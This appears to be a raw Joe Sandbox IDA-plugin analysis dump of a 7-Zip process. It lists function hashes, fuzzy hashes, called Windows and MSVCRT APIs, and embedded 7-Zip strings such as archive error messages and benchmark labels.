                                • Opcode ID: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                                • Instruction ID: 1d0616cb6296c7b5a1ca5517c7406f88105435424882a9bd409a4092ef86cec4
                                • Opcode Fuzzy Hash: d59108536d439d66a8f989801e68f7ac1a10c55ddb19c153846ac4e653761e0c
                                • Instruction Fuzzy Hash: A7014C73610794CAC7229F2DC18116DBB24F759FE8328921BDB4907761E776C883C7A1
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                                • Instruction ID: 21343f5dc0e63866e2a8ee37bdf345be1d7cda04368db17065c0f8b0b87fb6f2
                                • Opcode Fuzzy Hash: 3060b14f209173f6a28d50149139effb67babbacf6fb131f3e42512a25668859
                                • Instruction Fuzzy Hash: 36018F7B3522408AEB10CF25D56C39E3BA0A3D2B68F540209DB641B7D1C77EC54ACB94
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID:
                                • API String ID: 1452528299-0
                                • Opcode ID: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                                • Instruction ID: a18753fd0f097f193ddc1884e022e61db1f0bb6c1b5c811be0242496c2a30504
                                • Opcode Fuzzy Hash: 22fbc2d5e8199965c03e49c0b63e129300cee38c0b71475972f44996e2a71a3b
                                • Instruction Fuzzy Hash: 33F0A0B67500489BCB008F7A98802A922A1BB18795F94143AFF8B86311D62CCCDAC619
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                                • Instruction ID: db899280aa185ae9d8e2b68bff61ef979ac622190427d4c9ebfede43e58b45c3
                                • Opcode Fuzzy Hash: e16f68061b023a25359a80f0361e89c5542a2000306fd966a0e35091ec32aca1
                                • Instruction Fuzzy Hash: CEF0E1725296448E87A0DF29E44014ABBB0E3DA760B54122AB7EDC7A99E63CC544CF14
                                APIs
                                  • Part of subcall function 0041960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                • GetLastError.KERNEL32 ref: 0041EEF9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast
                                • String ID:
                                • API String ID: 918212764-0
                                APIs
                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467CE5
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467CEE
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D21
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D2E
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D5A
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D62
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D6A
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D77
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D80
                                • free.MSVCRT ref: 00467E5A
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID:
                                • String ID: .001$7-Zip cannot find MAPISendMail function$7zE$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$Updating for multivolume archives is not implemented$can't find archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout$type of archive is not specified
                                • API String ID: 0-3766773286
                                Similarity
                                • API ID: free$ClearCurrentFreeProcessVariantVirtualmemmove
                                • String ID: $ $ $ | $ (Cmplx)$1T CPU Freq (MHz):$@$AES128$AES192$Avg:$Avr:$Benchmark threads: $CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$`3G$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems$usage:
                                • API String ID: 362377386-2662154150
                                Similarity
                                • API ID: fputs$free$ErrorExceptionLastThrowfflushfputcmalloc
                                • String ID: : $ is not a file$----------$Archives$Can't allocate required memory$ERROR: $Listing archive: $Path$Total archives size$Volumes$opening :
                                • API String ID: 3292964186-2093788487
                                Similarity
                                • API ID: free$ClearVariantmemsetstrlen
                                • String ID:
                                • API String ID: 1009013457-0
                                Similarity
                                • API ID: ExceptionThrow
                                • String ID: There are unclosed input file:$bzip2$cannot open SFX module$cannot open file$update operations are not supported for this archive
                                • API String ID: 432778473-1171776569
                                Similarity
                                • API ID: free$ExceptionThrow$memmove$malloc
                                • String ID:
                                • API String ID: 273084669-0
                                Similarity
                                • API ID: free$memmove$memset$ExceptionThrow
                                • String ID: Split
                                • API String ID: 2395193269-1882502421
                                Similarity
                                • API ID: free$memmove
                                • String ID: Cannot open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                • API String ID: 1534225298-1557438135
                                Similarity
                                • API ID: free
                                • String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
                                • API String ID: 1294909896-4104380264
                                Similarity
                                • API ID: memmove
                                • String ID:
                                • API String ID: 2162964266-0
                                Similarity
                                • API ID: Processfputs$AddressCurrentProc$HandleLibraryLoadModuleTimesmemset
                                • String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                • API String ID: 2354542715-74044351
                                Similarity
                                • API ID: fputs$free$memset$strlen$memmove
                                • String ID: data:
                                • API String ID: 527563900-3222861102
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Strings
                                • Duplicate filename on disk:, xrefs: 0045F47E
                                • Duplicate filename in archive:, xrefs: 0045FA11
                                • Internal file name collision (file on disk, file in archive):, xrefs: 0045FA25
                                Similarity
                                • API ID: free$ExceptionThrow$CompareFileTimemallocmemset
                                • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                • API String ID: 1338569196-819937569
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLast
                                • String ID:
                                • API String ID: 408039514-0
                                • Opcode ID: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                                • Instruction ID: a42604c74d5b9f632a5cccfb5f0a0b74f29f8f132a3b43a6cbd18303980092ed
                                • Opcode Fuzzy Hash: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                                • Instruction Fuzzy Hash: C251A632218A0492DB10EF25E4513EE6761EBC5794F80121BFB9E43665DF6CC9C6CB18
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$DriveLogicalStrings
                                • String ID:
                                • API String ID: 837055893-0
                                • Opcode ID: eeccd6f7defde6efc8f0cd495c04816e19d06aaaecd41ca1a7633fb1c1c36bd7
                                • Instruction ID: de8e474b0f137d3e841ce908acb477434f07dce1d1362eded3c977f55618f228
                                • Opcode Fuzzy Hash: eeccd6f7defde6efc8f0cd495c04816e19d06aaaecd41ca1a7633fb1c1c36bd7
                                • Instruction Fuzzy Hash: C431F673301B4596DB21DF36E9602EE6351A784BE8F484226EE5E57385EF3CCD868304
                                APIs
                                • free.MSVCRT ref: 0041A745
                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 0041A79C
                                • DeviceIoControl.KERNEL32 ref: 0041A7E5
                                • free.MSVCRT ref: 0041A7F2
                                • free.MSVCRT ref: 0041A80F
                                • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 0041A83D
                                • free.MSVCRT ref: 0041A846
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ControlDeviceFileHandleInformationmemmove
                                • String ID:
                                • API String ID: 2572579059-0
                                • Opcode ID: 4066e2ee6e8f9b27f47df988d1a7b28cbd73a81777cb484f9c6dcbb339ab764d
                                • Instruction ID: b7983291e60e372f792c6696e770f6528da1766a99eb5438d4c64d67a9d4d703
                                • Opcode Fuzzy Hash: 4066e2ee6e8f9b27f47df988d1a7b28cbd73a81777cb484f9c6dcbb339ab764d
                                • Instruction Fuzzy Hash: 9731A632246A4089C630AF12F55079EB764E381BD4F584226EBFA47B95DE3DC9E1C704
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressDiskFreeHandleModuleProcSpace
                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                • API String ID: 1197914913-1127948838
                                • Opcode ID: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                                • Instruction ID: 8de0c168a01220b3c10bd43a078439a77133aa7d22c198e9c7338efa88badbc3
                                • Opcode Fuzzy Hash: 5d370a213c82000d50df565d7eb6e23dcd88d717ff6f1e5d8fdea57efaf77ff4
                                • Instruction Fuzzy Hash: 5E11267361AF4A96DA51CF55F480B9AB364F7A4B80F445022EB8E47728EF3CC599CB40
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcVersion
                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                • API String ID: 3310240892-2102062458
                                • Opcode ID: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                                • Instruction ID: ac3bad5048391dc924837b265b4de0de68b93b5c50d8d8ec178c94dc79a7cb7f
                                • Opcode Fuzzy Hash: 563f298735a5d66526b1f5c30411171ea632dd5cbad4a3b668af6bb52f64e198
                                • Instruction Fuzzy Hash: 53E01794B8B906C1FE08ABA5FCA83141321BB94701FC40017C60F0A360EF2C898AC309
                                APIs
                                • FileTimeToLocalFileTime.KERNEL32 ref: 0041C220
                                • FileTimeToSystemTime.KERNEL32 ref: 0041C234
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Time$File$LocalSystem
                                • String ID: gfff
                                • API String ID: 1748579591-1553575800
                                • Opcode ID: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                                • Instruction ID: 76a2171bd26c38dac9e08be45b9cf99993981d8257b9afc590bf028ee48734e6
                                • Opcode Fuzzy Hash: 15b91f131dabc2e5de4b5579ca893f376c918929ab631d04e4bfcae691de9260
                                • Instruction Fuzzy Hash: 77616A63F086C04BE31A8B3DD8A67DE6FC1E3A5704F098219DF9187789E66DC50AC761
                                APIs
                                  • Part of subcall function 0041C7B4: GetCurrentProcess.KERNEL32 ref: 0041C7BE
                                • GetSystemInfo.KERNEL32 ref: 0041C820
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CurrentInfoProcessSystem
                                • String ID:
                                • API String ID: 1098911721-0
                                • Opcode ID: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                                • Instruction ID: 6e8e4b8d753c5d619dcf4c8f60d985c4f8ea72eb1caa61b9eb78ae6d1c6019cd
                                • Opcode Fuzzy Hash: 92f3851c50a7677658cd70336f011c22dc4d7f21b1de78bcfa5f456b2cef6102
                                • Instruction Fuzzy Hash: C6E092B266445083CB70EB08DCC17AAA360F794786FC05213E58A82F14DB2DC695CF08
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                                • Instruction ID: 9011c9268c53e8ea481907737bc709f3ea53e4807f6b3ab2afdd051ea7549f1b
                                • Opcode Fuzzy Hash: 51b87b423445c07e3ff9f805dcea364fc8add8783b730053b3f1e0467506e147
                                • Instruction Fuzzy Hash: 9B416AA3B2157013EB1C8D1BAC14B355543B7C8394F9AE23A9E274F7C9E97D8C42C289
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                                • Instruction ID: e6fd6e75b518488c83082ff478ed8f76231815600e2e357874e717f00e7f216a
                                • Opcode Fuzzy Hash: a1e193211b1377197a9ffed0db1a3082c11c6598efc29a2749b5744c5b9d6266
                                • Instruction Fuzzy Hash: F63113906B10F0038B1C0AAFECB3333200213902041FD842FB70385F80ED1CC811010C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                                • Instruction ID: f52d9a01066fed735ac48f46ccf263126aeea3bd06bcdfba80e743d215ba9300
                                • Opcode Fuzzy Hash: 9bf3d84cf31aa177eb5d0cb971182c19ef539d475a2d73d801f53471c03aa189
                                • Instruction Fuzzy Hash: 17314D77760A0647D78CCA29DC73B7A32E1E389205F849A3EEA5ACA2C1E738D415C344
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                                • Instruction ID: 858cf4d25f1df30a1382e2175bcd46ff84fd8700506ab727d4d98afb566c22e8
                                • Opcode Fuzzy Hash: 2cd27a4dda1deeeaf334fe34166b18873a0706cf160d75d765b7e8183f0e3f57
                                • Instruction Fuzzy Hash: D5216E27B51E181BEF1E8939F811BEA16805B94B84F89503AAD0FD3788E9BCDD47C304
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                                • Instruction ID: 8ffef5796404105db817fda9cf3c22bbe175c44f8ea82bac2a2ddf0ecb3be315
                                • Opcode Fuzzy Hash: 05d75bd9e6c7a1b6fb157d21d0ebc0644388d6d38c98960a44e8038350d5c7f1
                                • Instruction Fuzzy Hash: D62129B7E102A04BC7068E7ED6842E6B391F7047FEF024722EF5563AD8E11C6454C250
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                                • Instruction ID: fb41a8172f9b7f715e729bb568392e66779742b0a448fa428a8e01dc66fbc93b
                                • Opcode Fuzzy Hash: 3590c6d0bcf59f41b6e76912e67f45de8633cf2801e00cea3d94b070f5cd6fe1
                                • Instruction Fuzzy Hash: 992138F3A204608AC306CF3ADA887B663E1FB187FDF5687228F5257AC8E51C9441D610
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                                • Instruction ID: 9ab6d6dda478acfafeb67826c4488e77cb332f001fa19a8b07431decd4c83304
                                • Opcode Fuzzy Hash: 2716c4ae18f5ff5d555640cd6024ddbdb25aea7ac000581464c462b0bdaade77
                                • Instruction Fuzzy Hash: 38D01275BA900343EF88313C29023A911C14398325FA88A9DEC1EC6751E55DCEF2940C
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLast
                                • String ID:
                                • API String ID: 408039514-0
                                • Opcode ID: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                                • Instruction ID: d044f415b01c67fcc44e9bfdf86bb16f18a381088ce2a6bba04e524d1dbe4e40
                                • Opcode Fuzzy Hash: 606528062de862ecd2e5ad603e6f1674b931153cadb5dc82d0d34aaa2013ffa8
                                • Instruction Fuzzy Hash: B502D83229568D82CB20EB33F55169FA720F7C5784F401117EE9ED7A25DEACC892CB49
                                APIs
                                Strings
                                • Cannot fill link data, xrefs: 0042852A
                                • Empty link, xrefs: 00428406
                                • Internal error for symbolic link file, xrefs: 004285A8
                                • Dangerous link path was ignored, xrefs: 00428377
                                • Cannot create symbolic link, xrefs: 00428660
                                • Cannot create hard link, xrefs: 00428451
                                • Incorrect path, xrefs: 004283D4
                                • Dangerous symbolic link path was ignored, xrefs: 004284D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot create hard link$Cannot create symbolic link$Cannot fill link data$Dangerous link path was ignored$Dangerous symbolic link path was ignored$Empty link$Incorrect path$Internal error for symbolic link file
                                • API String ID: 1294909896-553938736
                                • Opcode ID: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
                                • Instruction ID: 83032b3450fd25a6ca6c4dfe45f8fb08ccfe11b6ae4438954de31862d0dff733
                                • Opcode Fuzzy Hash: af50df62797d8402ac558955d229e3593c8d56c8c66c2bf677da475acf059cb7
